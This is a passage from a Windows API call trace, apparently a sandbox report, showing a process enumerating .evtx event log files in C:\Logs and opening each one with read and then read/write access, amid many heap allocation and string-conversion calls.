dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.976] GetFileType (hFile=0x410) returned 0x1 [0071.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.976] CloseHandle (hObject=0x410) returned 1 [0071.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.977] AreFileApisANSI () returned 1 [0071.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 58 [0071.977] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.978] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.979] AreFileApisANSI () returned 1 [0071.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0071.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0071.979] AreFileApisANSI () returned 1 [0071.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 56 [0071.979] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.979] GetFileType (hFile=0x410) returned 0x1 [0071.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.980] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.980] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.980] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.980] CloseHandle (hObject=0x410) returned 1 [0071.980] AreFileApisANSI () returned 1 [0071.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 56 [0071.980] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.980] GetFileType (hFile=0x410) returned 0x1 [0071.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.981] CloseHandle (hObject=0x410) returned 1 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.981] AreFileApisANSI () returned 1 [0071.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 56 [0071.981] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0071.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.982] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0071.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0071.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.983] AreFileApisANSI () returned 1 [0071.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpUsedDefaultChar=0x0) returned 58 [0071.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.983] AreFileApisANSI () returned 1 [0071.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0071.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 58 [0071.983] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.983] GetFileType (hFile=0x410) returned 0x1 [0071.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0071.983] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.984] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.984] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.984] CloseHandle (hObject=0x410) returned 1 [0071.984] AreFileApisANSI () returned 1 [0071.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0071.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 58 [0071.984] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.984] GetFileType (hFile=0x410) returned 0x1 [0071.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.984] CloseHandle (hObject=0x410) returned 1 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 